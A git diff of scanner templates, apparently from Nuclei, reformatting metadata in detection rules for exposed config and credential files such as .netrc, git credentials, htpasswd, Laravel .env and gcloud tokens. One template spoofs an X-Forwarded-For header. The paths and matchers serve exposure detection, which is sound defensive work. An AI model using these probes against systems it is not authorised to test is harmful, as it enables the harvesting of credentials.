a/http/exposures/configs/editor-exposure.yaml b/http/exposures/configs/editor-exposure.yaml index 5e81e29346..a8d268d042 100644 --- a/http/exposures/configs/editor-exposure.yaml +++ b/http/exposures/configs/editor-exposure.yaml @@ -6,8 +6,8 @@ info: severity: low description: Editor configuration file was detected. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"editorconfig" tags: config,exposure diff --git a/http/exposures/configs/esmtprc-config.yaml b/http/exposures/configs/esmtprc-config.yaml index 8d46c035fc..9e8097c0d8 100644 --- a/http/exposures/configs/esmtprc-config.yaml +++ b/http/exposures/configs/esmtprc-config.yaml @@ -7,9 +7,9 @@ info: description: eSMTP configuration was discovered. reference: - https://linux.die.net/man/5/esmtprc - tags: esmtp,config,exposure metadata: max-request: 1 + tags: esmtp,config,exposure http: - method: GET diff --git a/http/exposures/configs/exposed-authentication-asmx.yaml b/http/exposures/configs/exposed-authentication-asmx.yaml index ba1eea451d..6784f99dde 100644 --- a/http/exposures/configs/exposed-authentication-asmx.yaml +++ b/http/exposures/configs/exposed-authentication-asmx.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6604 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,edb metadata: max-request: 1 + tags: config,exposure,edb http: - method: GET diff --git a/http/exposures/configs/exposed-bitkeeper.yaml b/http/exposures/configs/exposed-bitkeeper.yaml index 089272b9e2..159e32375b 100644 --- a/http/exposures/configs/exposed-bitkeeper.yaml +++ b/http/exposures/configs/exposed-bitkeeper.yaml @@ -7,9 +7,9 @@ info: description: BitKeeper configuration was detected. reference: - https://www.bitkeeper.org/man/config-etc.html - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET diff --git a/http/exposures/configs/exposed-bzr.yaml b/http/exposures/configs/exposed-bzr.yaml index 073a08956f..9520c13660 100644 --- a/http/exposures/configs/exposed-bzr.yaml +++ b/http/exposures/configs/exposed-bzr.yaml @@ -9,11 +9,11 @@ info: - http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET diff --git a/http/exposures/configs/exposed-darcs.yaml b/http/exposures/configs/exposed-darcs.yaml index 65a304012d..5845a9a5d4 100644 --- a/http/exposures/configs/exposed-darcs.yaml +++ b/http/exposures/configs/exposed-darcs.yaml @@ -9,11 +9,11 @@ info: - http://darcs.net/Using/Configuration#sources classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET diff --git a/http/exposures/configs/exposed-gitignore.yaml b/http/exposures/configs/exposed-gitignore.yaml index b1c7a7d3dc..ce43d09ea7 100644 --- a/http/exposures/configs/exposed-gitignore.yaml +++ b/http/exposures/configs/exposed-gitignore.yaml @@ -10,11 +10,11 @@ info: - https://www.tenable.com/plugins/was/98595 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: exposure,tenable,config,git metadata: max-request: 3 + tags: exposure,tenable,config,git http: - method: GET diff --git a/http/exposures/configs/exposed-hg.yaml b/http/exposures/configs/exposed-hg.yaml index 0a0577f557..a06c03537d 100644 --- a/http/exposures/configs/exposed-hg.yaml +++ b/http/exposures/configs/exposed-hg.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET diff --git a/http/exposures/configs/exposed-sharepoint-list.yaml b/http/exposures/configs/exposed-sharepoint-list.yaml index 9c9592b86c..c0e3d0fbd5 100644 --- a/http/exposures/configs/exposed-sharepoint-list.yaml +++ b/http/exposures/configs/exposed-sharepoint-list.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: hackerone,config,exposure,sharepoint metadata: max-request: 1 + tags: hackerone,config,exposure,sharepoint http: - method: GET diff --git a/http/exposures/configs/exposed-svn.yaml b/http/exposures/configs/exposed-svn.yaml index a8be32eb2f..2540970a89 100644 --- a/http/exposures/configs/exposed-svn.yaml +++ b/http/exposures/configs/exposed-svn.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure,svn metadata: max-request: 1 + tags: config,exposure,svn http: - method: GET diff --git a/http/exposures/configs/exposed-vscode.yaml b/http/exposures/configs/exposed-vscode.yaml index 56e553b7f5..2da45dcbf7 100644 --- a/http/exposures/configs/exposed-vscode.yaml +++ b/http/exposures/configs/exposed-vscode.yaml @@ -9,14 +9,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: vscode,exposure metadata: max-request: 1 + tags: vscode,exposure http: - method: GET path: - "{{BaseURL}}/.vscode/" + matchers: - type: word words: diff --git a/http/exposures/configs/firebase-config-exposure.yaml b/http/exposures/configs/firebase-config-exposure.yaml index 6875d06853..e725ad164c 100644 --- a/http/exposures/configs/firebase-config-exposure.yaml +++ b/http/exposures/configs/firebase-config-exposure.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: firebase,exposure,config metadata: max-request: 3 + tags: firebase,exposure,config http: - method: GET @@ -24,7 +24,6 @@ http: matchers-condition: and matchers: - - type: word words: - "apiKey:" diff --git a/http/exposures/configs/ftp-credentials-exposure.yaml b/http/exposures/configs/ftp-credentials-exposure.yaml index 63af45ce23..3566277e2f 100644 --- a/http/exposures/configs/ftp-credentials-exposure.yaml +++ b/http/exposures/configs/ftp-credentials-exposure.yaml @@ -10,8 +10,8 @@ info: cvss-score: 7.5 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 google-query: inurl:"/ftpsync.settings" tags: config,ftp,exposure diff --git a/http/exposures/configs/gcloud-config-default.yaml b/http/exposures/configs/gcloud-config-default.yaml index 114ed7399f..cce4b00704 100644 --- a/http/exposures/configs/gcloud-config-default.yaml +++ b/http/exposures/configs/gcloud-config-default.yaml @@ -8,11 +8,11 @@ info: reference: https://cloud.google.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"access_tokens.db" tags: google,cloud,devops,exposure @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/.config/gcloud/configurations/config_default" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/git-config-nginxoffbyslash.yaml b/http/exposures/configs/git-config-nginxoffbyslash.yaml index 0065037b51..dd34d97212 100644 --- a/http/exposures/configs/git-config-nginxoffbyslash.yaml +++ b/http/exposures/configs/git-config-nginxoffbyslash.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: config,exposure,nginx metadata: max-request: 10 + tags: config,exposure,nginx http: - method: GET diff --git a/http/exposures/configs/git-credentials-disclosure.yaml b/http/exposures/configs/git-credentials-disclosure.yaml index 68623e036a..fbb0f3f0c8 100644 --- a/http/exposures/configs/git-credentials-disclosure.yaml +++ b/http/exposures/configs/git-credentials-disclosure.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,config metadata: max-request: 1 + tags: exposure,config http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "https://" diff --git a/http/exposures/configs/github-workflows-disclosure.yaml b/http/exposures/configs/github-workflows-disclosure.yaml index e9ec01c4dd..66d53c5dda 100644 --- a/http/exposures/configs/github-workflows-disclosure.yaml +++ b/http/exposures/configs/github-workflows-disclosure.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/github-workflows-disclosure.json - tags: exposure,config metadata: max-request: 27 + tags: exposure,config http: - method: GET diff --git a/http/exposures/configs/gmail-api-client-secrets.yaml b/http/exposures/configs/gmail-api-client-secrets.yaml index 3caefc06c6..4660155ba6 100644 --- a/http/exposures/configs/gmail-api-client-secrets.yaml +++ b/http/exposures/configs/gmail-api-client-secrets.yaml @@ -8,11 +8,11 @@ info: reference: https://developers.google.com/gmail/api/auth/web-server classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET @@ -27,9 +27,11 @@ http: - "auth_uri" - "token_uri" condition: and + - type: status status: - 200 + - type: word part: header words: diff --git a/http/exposures/configs/golangci-config.yaml b/http/exposures/configs/golangci-config.yaml index 50ae5e2022..85c20add58 100644 --- a/http/exposures/configs/golangci-config.yaml +++ b/http/exposures/configs/golangci-config.yaml @@ -10,11 +10,11 @@ info: - https://golangci-lint.run/usage/configuration/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 4 verified: true + max-request: 4 github-query: filename:golangci.yml tags: exposure,golang,devops,cicd @@ -27,6 +27,7 @@ http: - "{{BaseURL}}/.golangci.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/gruntfile-exposure.yaml b/http/exposures/configs/gruntfile-exposure.yaml index bb4780621b..2e5e1f906d 100644 --- a/http/exposures/configs/gruntfile-exposure.yaml +++ b/http/exposures/configs/gruntfile-exposure.yaml @@ -9,11 +9,11 @@ info: - https://gruntjs.com/sample-gruntfile classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure metadata: max-request: 2 + tags: config,exposure http: - method: GET @@ -23,6 +23,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/guard-config.yaml b/http/exposures/configs/guard-config.yaml index cab3f02feb..e35410b8ab 100644 --- a/http/exposures/configs/guard-config.yaml +++ b/http/exposures/configs/guard-config.yaml @@ -10,11 +10,11 @@ info: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Guardfile" tags: exposure,file,guard,config diff --git a/http/exposures/configs/hikvision-info-leak.yaml b/http/exposures/configs/hikvision-info-leak.yaml index 4592459247..0c72ef879a 100644 --- a/http/exposures/configs/hikvision-info-leak.yaml +++ b/http/exposures/configs/hikvision-info-leak.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,config,hikvision metadata: max-request: 1 + tags: exposure,config,hikvision http: - method: GET diff --git a/http/exposures/configs/honeywell-scada-config.yaml b/http/exposures/configs/honeywell-scada-config.yaml index 3f5ed64049..6c94a39723 100644 --- a/http/exposures/configs/honeywell-scada-config.yaml +++ b/http/exposures/configs/honeywell-scada-config.yaml @@ -7,9 +7,9 @@ info: description: Honeywell Scada configuration file was detected. The downloaded file opens with the file name and contains critical information about the destination address. reference: - https://www.exploit-db.com/exploits/44734 - tags: scada,config,exposure,edb metadata: max-request: 1 + tags: scada,config,exposure,edb http: - method: GET diff --git a/http/exposures/configs/hp-ilo-serial-key-disclosure.yaml b/http/exposures/configs/hp-ilo-serial-key-disclosure.yaml index 18a7feaf47..ac3ee93194 100644 --- a/http/exposures/configs/hp-ilo-serial-key-disclosure.yaml +++ b/http/exposures/configs/hp-ilo-serial-key-disclosure.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,config metadata: max-request: 1 + tags: exposure,config http: - method: GET diff --git a/http/exposures/configs/htpasswd-detection.yaml b/http/exposures/configs/htpasswd-detection.yaml index 2626ae7442..1df8927861 100644 --- a/http/exposures/configs/htpasswd-detection.yaml +++ b/http/exposures/configs/htpasswd-detection.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET diff --git a/http/exposures/configs/httpd-config.yaml b/http/exposures/configs/httpd-config.yaml index a6cff73ff0..01e10fb90a 100644 --- a/http/exposures/configs/httpd-config.yaml +++ b/http/exposures/configs/httpd-config.yaml @@ -8,11 +8,11 @@ info: reference: https://httpd.apache.org/docs/current/configuring.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,httpd metadata: max-request: 1 + tags: config,exposure,httpd http: - method: GET diff --git a/http/exposures/configs/javascript-env.yaml b/http/exposures/configs/javascript-env.yaml index 452d4c3378..a9584c0e4c 100644 --- a/http/exposures/configs/javascript-env.yaml +++ b/http/exposures/configs/javascript-env.yaml @@ -5,9 +5,9 @@ info: author: pdp,geeknik severity: low description: Multiple common JavaScript environment configuration files were detected. - tags: javascript,config,exposure metadata: max-request: 6 + tags: javascript,config,exposure http: - method: GET @@ -21,7 +21,6 @@ http: matchers-condition: and matchers: - - type: status status: - 200 diff --git a/http/exposures/configs/jetbrains-datasources.yaml b/http/exposures/configs/jetbrains-datasources.yaml index 37ed202d6a..113b2b8771 100644 --- a/http/exposures/configs/jetbrains-datasources.yaml +++ b/http/exposures/configs/jetbrains-datasources.yaml @@ -8,11 +8,11 @@ info: reference: https://www.jetbrains.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,jetbrains metadata: max-request: 1 + tags: config,exposure,jetbrains http: - method: GET diff --git a/http/exposures/configs/jkstatus-manager.yaml b/http/exposures/configs/jkstatus-manager.yaml index 9a76c43284..56aa73e9cc 100644 --- a/http/exposures/configs/jkstatus-manager.yaml +++ b/http/exposures/configs/jkstatus-manager.yaml @@ -7,16 +7,16 @@ info: reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/JKStatus.java metadata: - max-request: 8 verified: true + max-request: 8 shodan-query: html:"JK Status Manager" tags: config,jk,status,exposure http: - method: GET + headers: X-Forwarded-For: "127.0.0.1" - path: - "{{BaseURL}}" - "{{BaseURL}}/status" diff --git a/http/exposures/configs/joomla-config-file.yaml b/http/exposures/configs/joomla-config-file.yaml index 35d0e1a7ce..c0902ac58a 100644 --- a/http/exposures/configs/joomla-config-file.yaml +++ b/http/exposures/configs/joomla-config-file.yaml @@ -5,9 +5,9 @@ info: author: oppsec severity: low description: Joomla! configuration.php-dist file was detected. - tags: config,exposure,joomla metadata: max-request: 1 + tags: config,exposure,joomla http: - method: GET diff --git a/http/exposures/configs/karma-config-js.yaml b/http/exposures/configs/karma-config-js.yaml index ab60e3a041..c968009f9e 100644 --- a/http/exposures/configs/karma-config-js.yaml +++ b/http/exposures/configs/karma-config-js.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"karma.conf.js" tags: config,exposure,devops @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/karma.conf.js" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/keycloak-openid-config.yaml b/http/exposures/configs/keycloak-openid-config.yaml index 42465e0d36..e20c7eb1ab 100644 --- a/http/exposures/configs/keycloak-openid-config.yaml +++ b/http/exposures/configs/keycloak-openid-config.yaml @@ -9,11 +9,11 @@ info: - https://issues.jboss.org/browse/KEYCLOAK-571 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: keycloak,config,exposure metadata: max-request: 2 + tags: keycloak,config,exposure http: - method: GET diff --git a/http/exposures/configs/kubernetes-kustomization-disclosure.yaml b/http/exposures/configs/kubernetes-kustomization-disclosure.yaml index 12eba137e5..b9ee4597d6 100644 --- a/http/exposures/configs/kubernetes-kustomization-disclosure.yaml +++ b/http/exposures/configs/kubernetes-kustomization-disclosure.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,config,kubernetes metadata: max-request: 1 + tags: exposure,config,kubernetes http: - method: GET diff --git a/http/exposures/configs/kyan-credential-exposure.yaml b/http/exposures/configs/kyan-credential-exposure.yaml index d435b78012..76f6f54297 100644 --- a/http/exposures/configs/kyan-credential-exposure.yaml +++ b/http/exposures/configs/kyan-credential-exposure.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: kyan,exposure,config metadata: max-request: 1 + tags: kyan,exposure,config http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "UserName=" @@ -36,4 +35,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposures/configs/laravel-env.yaml b/http/exposures/configs/laravel-env.yaml index a91ee394c1..38e971a3d2 100644 --- a/http/exposures/configs/laravel-env.yaml +++ b/http/exposures/configs/laravel-env.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: config,exposure,laravel metadata: max-request: 22 + tags: config,exposure,laravel http: - method: GET diff --git a/http/exposures/configs/lvmeng-uts-disclosure.yaml b/http/exposures/configs/lvmeng-uts-disclosure.yaml index 3a08d5beeb..79709defb4 100644 --- a/http/exposures/configs/lvmeng-uts-disclosure.yaml +++ b/http/exposures/configs/lvmeng-uts-disclosure.yaml @@ -5,14 +5,15 @@ info: author: pikpikcu severity: high description: Lvmeng UTS was discovered. - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET path: - "{{BaseURL}}/webapi/v1/system/accountmanage/account" + headers: Content-Type: application/json @@ -21,11 +22,13 @@ http: - type: status status: - 200 + - type: word words: - "application/json" condition: and part: header + - type: word words: - "password" diff --git a/http/exposures/configs/magento-config-disclosure.yaml b/http/exposures/configs/magento-config-disclosure.yaml index 401d871ad1..befa2a7c9b 100644 --- a/http/exposures/configs/magento-config-disclosure.yaml +++ b/http/exposures/configs/magento-config-disclosure.yaml @@ -13,8 +13,8 @@ info: cvss-score: 7.5 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.component:"Magento" tags: magento,exposure,credential,config @@ -26,6 +26,7 @@ http: - "{{BaseURL}}/store/app/etc/local.xml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/mercurial-hgignore.yaml b/http/exposures/configs/mercurial-hgignore.yaml index 9a42e68110..17b84d3855 100644 --- a/http/exposures/configs/mercurial-hgignore.yaml +++ b/http/exposures/configs/mercurial-hgignore.yaml @@ -9,11 +9,11 @@ info: - https://swcarpentry.github.io/hg-novice/08-ignore/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"hgignore" tags: exposure,hgignore,config,mercurial diff --git a/http/exposures/configs/msmtp-config.yaml b/http/exposures/configs/msmtp-config.yaml index 26f5a82488..97ea0f1d00 100644 --- a/http/exposures/configs/msmtp-config.yaml +++ b/http/exposures/configs/msmtp-config.yaml @@ -8,8 +8,8 @@ info: reference: - https://wiki.archlinux.org/title/Msmtp metadata: - max-request: 1 verified: true + max-request: 1 tags: exposure,msmtp http: diff --git a/http/exposures/configs/nagios-status-page.yaml b/http/exposures/configs/nagios-status-page.yaml index 8c35d997d1..663470a309 100644 --- a/http/exposures/configs/nagios-status-page.yaml +++ b/http/exposures/configs/nagios-status-page.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,nagios,status,edb metadata: max-request: 3 + tags: exposure,nagios,status,edb http: - method: GET diff --git a/http/exposures/configs/netbeans-config.yaml b/http/exposures/configs/netbeans-config.yaml index 0b2a924a21..cbbe793669 100644 --- a/http/exposures/configs/netbeans-config.yaml +++ b/http/exposures/configs/netbeans-config.yaml @@ -9,11 +9,11 @@ info: - https://netbeans.apache.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: netbeans,config,exposure metadata: max-request: 1 + tags: netbeans,config,exposure http: - method: GET diff --git a/http/exposures/configs/netrc.yaml b/http/exposures/configs/netrc.yaml index 8827ac0f67..c11f1c6eb5 100644 --- a/http/exposures/configs/netrc.yaml +++ b/http/exposures/configs/netrc.yaml @@ -7,9 +7,9 @@ info: description: Netrc configuration file was discovered. reference: - https://www.gnu.org/software/inetutils/manual/html_node/The-_002enetrc-file.html - tags: netrc,config,exposure metadata: max-request: 2 + tags: netrc,config,exposure http: - method: GET @@ -22,9 +22,11 @@ http: - type: status status: - 200 + - type: regex regex: - "machine [0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\\.?" + - type: word words: - "login " diff --git a/http/exposures/configs/nginx-config.yaml b/http/exposures/configs/nginx-config.yaml index fb75c1ca26..faeef88164 100644 --- a/http/exposures/configs/nginx-config.yaml +++ b/http/exposures/configs/nginx-config.yaml @@ -9,11 +9,11 @@ info: - https://nginx.org/en/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,nginx metadata: max-request: 1 + tags: config,exposure,nginx http: - method: GET @@ -26,6 +26,7 @@ http: words: - "html>" negative: true + - type: word words: - "server" diff --git a/http/exposures/configs/opcache-status-exposure.yaml b/http/exposures/configs/opcache-status-exposure.yaml index 303e6c6849..d3589f7fe7 100644 --- a/http/exposures/configs/opcache-status-exposure.yaml +++ b/http/exposures/configs/opcache-status-exposure.yaml @@ -5,14 +5,14 @@ info: author: pdteam severity: medium description: OPcache status page was detected. + reference: https://www.php.net/manual/en/book.opcache.php classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: https://www.php.net/manual/en/book.opcache.php - tags: config,exposure,status metadata: max-request: 3 + tags: config,exposure,status http: - method: GET @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/opcache-status/" - "{{BaseURL}}/php-opcache-status/" - "{{BaseURL}}/opcache-status/opcache.php" + matchers: - type: word words: diff --git a/http/exposures/configs/oracle-cgi-printenv.yaml b/http/exposures/configs/oracle-cgi-printenv.yaml index c077939963..91b2dfef5c 100644 --- a/http/exposures/configs/oracle-cgi-printenv.yaml +++ b/http/exposures/configs/oracle-cgi-printenv.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: exposure,oracle,config metadata: max-request: 1 + tags: exposure,oracle,config http: - method: GET diff --git a/http/exposures/configs/oracle-ebs-credentials.yaml b/http/exposures/configs/oracle-ebs-credentials.yaml index bc1e3506e9..df30982fc7 100644 --- a/http/exposures/configs/oracle-ebs-credentials.yaml +++ b/http/exposures/configs/oracle-ebs-credentials.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: config,exposure,oracle metadata: max-request: 1 + tags: config,exposure,oracle http: - method: GET diff --git a/http/exposures/configs/ovpn-config-exposed.yaml b/http/exposures/configs/ovpn-config-exposed.yaml index 5613ab06d5..aec811834e 100644 --- a/http/exposures/configs/ovpn-config-exposed.yaml +++ b/http/exposures/configs/ovpn-config-exposed.yaml @@ -8,8 +8,8 @@ info: classification: cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"OVPN Config Download" tags: config,ovpn,exposure @@ -20,6 +20,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/owncloud-config.yaml b/http/exposures/configs/owncloud-config.yaml index dc413c76c6..7b0229a414 100644 --- a/http/exposures/configs/owncloud-config.yaml +++ b/http/exposures/configs/owncloud-config.yaml @@ -2,18 +2,18 @@ id: owncloud-config info: name: owncloud Config - Detect - severity: info author: Mahendra Purbia (Mah3Sec_) + severity: info description: owncloud configuration information was detected. reference: - https://owncloud.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure metadata: max-request: 1 + tags: config,exposure http: - method: GET diff --git a/http/exposures/configs/package-json.yaml b/http/exposures/configs/package-json.yaml index 81397235fc..54764895a5 100644 --- a/http/exposures/configs/package-json.yaml +++ b/http/exposures/configs/package-json.yaml @@ -11,8 +11,8 @@ info: - https://classic.yarnpkg.com/lang/en/docs/package-json/ - https://pnpm.io/package_json metadata: - max-request: 2 verified: true + max-request: 2 tags: config,exposure,node,npm http: diff --git a/http/exposures/configs/parameters-config.yaml b/http/exposures/configs/parameters-config.yaml index 1c79264041..fc39bbabd6 100644 --- a/http/exposures/configs/parameters-config.yaml +++ b/http/exposures/configs/parameters-config.yaml @@ -7,8 +7,8 @@ info: description: Parameters.yml was discovered. reference: https://www.exploit-db.com/ghdb/5986 metadata: - max-request: 4 verified: true + max-request: 4 shodan-query: html:"parameters.yml" tags: exposure,cloud,devops @@ -21,6 +21,7 @@ http: - "{{BaseURL}}/app/config/parameters.yml.dist" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/configs/perl-status.yaml b/http/exposures/configs/perl-status.yaml index be4b5aebf2..be0c12b980 100644 --- a/http/exposures/configs/perl-status.yaml +++ b/http/exposures/configs/perl-status.yaml @@ -5,19 +5,20 @@ info: author: pdteam severity: medium description: Apache mod_perl status page was detected. + reference: https://perl.apache.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: https://perl.apache.org/ - tags: config,exposure,apache,status metadata: max-request: 1 + tags: config,exposure,apache,status http: - method: GET path: - '{{BaseURL}}/perl-status' + matchers: - type: word words: diff --git a/http/exposures/configs/phalcon-framework-source.yaml b/http/exposures/configs/phalcon-framework-source.yaml index 635cceb800..3d58f8f029 100644 --- a/http/exposures/configs/phalcon-framework-source.yaml +++ b/http/exposures/configs/phalcon-framework-source.yaml @@ -5,9 +5,9 @@ info: author: philippedelteil severity: high description: Phalcon Framework source code was discovered. - tags: exposure,debug,phalcon metadata: max-request: 1 + tags: exposure,debug,phalcon http: - method: GET diff --git a/http/exposures/configs/php-fpm-config.yaml b/http/exposures/configs/php-fpm-config.yaml index ad7c3b6efb..25512610c0 100644 --- a/http/exposures/configs/php-fpm-config.yaml +++ b/http/exposures/configs/php-fpm-config.yaml @@ -8,11 +8,11 @@ info: reference: https://www.php.net/manual/en/install.fpm.php classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: config,exposure,php 